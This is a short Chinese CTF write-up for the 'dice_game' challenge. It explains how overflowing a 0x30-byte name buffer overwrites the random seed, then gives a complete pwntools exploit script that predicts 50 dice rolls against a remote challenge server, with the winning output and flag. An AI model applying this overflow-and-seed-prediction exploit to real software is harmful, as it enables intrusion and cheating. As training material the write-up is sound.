写在前面

这道题和新手区的guess_num如出一辙，都用到了覆盖和随机种子，可以参考一下/>.</

0x01寻找漏洞

首先整个程序流程就是猜对50次的数字后就可以get flag了

---

实际上呢只给buf分配了0x30的空间

我们写入0x40的数据就可以覆盖到seed了

0x02exp

#!usr/bin/python

from pwn import *
from ctypes import *
# context.log_level = "debug"

io = remote("111.198.29.45",53501)
# io = process("./dice_game")
libc = cdll.LoadLibrary("./libc.so.6")

payload = "a" * 0x40 + p64(1)
io.recvuntil("your name: ")
io.sendline(payload)

libc.srand(1)
for i in range(50):
  num = str(libc.rand()%6+1)
  io.recvuntil("point(1~6): ")
  io.sendline(str(num))

io.interactive()

kk@ubuntu:~/Desktop/black/GFSJ/dice_game$ python exp.py 
[+] Opening connection to 111.198.29.45 on port 53501: Done
[*] Switching to interactive mode
You win.
Congrats aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa�I
cyberpeace{TryTry口喜口喜}

Bye bye!
[*] Got EOF while reading in interactive
$